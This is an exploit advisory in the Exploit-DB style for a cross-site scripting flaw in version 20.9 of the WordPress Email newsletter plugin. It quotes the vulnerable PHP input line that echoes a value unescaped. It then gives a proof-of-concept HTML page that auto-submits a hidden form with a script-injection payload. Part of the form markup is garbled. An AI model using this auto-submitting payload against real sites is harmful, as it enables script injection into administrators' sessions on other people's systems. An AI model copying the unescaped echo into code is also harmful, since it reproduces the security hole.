###################### # Exploit Title : Wordpress Email newsletter 20.9 Cross Site Scripting   # Exploit Author : Ashiyane Digital Security Team   # Vendor Homepage : https://wordpress.org/plugins/email-newsletter/   # Software Link : https://downloads.wordpress.org/plugin/email-newsletter.20.9.zip   # Date : 2015-01-03   # Tested on : Windows 7 / Mozilla Firefox ######################     ###################### # Vulnerable code : <input name="eemail_from_name" id="eemail_from_name" type="text"value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" /> #####################   Exploit Code:   <html> <body> <form name="eemail_form" method="post"_email_setting()" > <input name="eemail_from_email" id="eemail_from_email" type="hidden"value='"><script>alert(1)</script>' maxlength="150" size="50" /> <script language="Javascript"> setTimeout('eemail_form.submit()', 1); </script> </body> </html>